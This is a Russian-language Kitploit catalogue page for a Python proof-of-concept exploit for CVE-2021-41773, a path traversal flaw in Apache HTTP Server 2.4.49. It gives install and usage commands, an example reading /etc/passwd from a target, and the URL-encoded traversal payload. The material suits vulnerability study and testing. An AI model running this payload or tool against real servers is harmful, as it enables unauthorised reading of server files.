Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
PoC-CVE-2021-41773 — Эксплойт на Python для CVE-2021-41773 - уязвимость Path Traversal в Apache HTTP Server 2.4.49 | Kitploit
Инструменты/GitHubGitHub/blu3ming/poc-cve-2021-41773
РазведкаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubblu3ming/poc-cve-2021-41773

PoC-CVE-2021-41773

Эксплойт на Python для CVE-2021-41773 - уязвимость Path Traversal в Apache HTTP Server 2.4.49

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-41773 Эксплойт обхода пути Apache HTTP Server

Эксплойт на Python для CVE-2021-41773, уязвимости обхода пути в Apache HTTP Server 2.4.49, позволяющей читать произвольные файлы с сервера.

Детали уязвимости

CVE-2021-41773 — это уязвимость обхода пути в Apache HTTP Server 2.4.49, возникающая из-за неправильной проверки путей, предоставленных пользователем. Уязвимость позволяет злоумышленникам читать файлы за пределами корневой директории документов, используя последовательности обхода пути, закодированные в URL.

  • CVSS Score: 7.5 (Высокий)
  • Affected Versions: Apache HTTP Server 2.4.49
  • Vector: Удалённый, без аутентификации

Установка

root@kitploit:~
git clone https://github.com/blu3ming/PoC-CVE-2021-41773
cd PoC-CVE-2021-41773
pip install -r requirements.txt

Использование

root@kitploit:~
python3 cve-2021-41773.py -t <target> -f <file_path>

Параметры

  • -t, --target: Целевой URL (включите протокол и порт при необходимости)
  • -f, --file: Путь к файлу для чтения с сервера

Пример

root@kitploit:~
# Read /etc/passwd
python3 cve-2021-41773.py -t http://192.168.1.100:443 -f /etc/passwd

Успешный эксплойт

Как это работает

Эксплойт использует последовательности обхода пути, закодированные в URL (.%2e/%2e%2e/), для обхода проверки пути Apache:

  1. Уязвимая версия Apache не может правильно декодировать и проверить путь.
  2. Закодированные в URL точки (.%2e) обходят первоначальные проверки безопасности.
  3. Сервер обрабатывает обход пути после декодирования, что позволяет получить доступ к файлам.

Ключевой момент — использование urllib3.PoolManager() вместо requests.get() для предотвращения автоматической нормализации URL, которая могла бы нарушить работу эксплойта.

Технические детали

root@kitploit:~
# The exploit URL structure:
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/{target_file}

Это преобразуется в:

root@kitploit:~
/cgi-bin/../../../../{target_file}

Ссылки

  • CVE-2021-41773 - MITRE
  • Уведомление о безопасности Apache HTTP Server
  • NVD - CVE-2021-41773
Скачать инструмент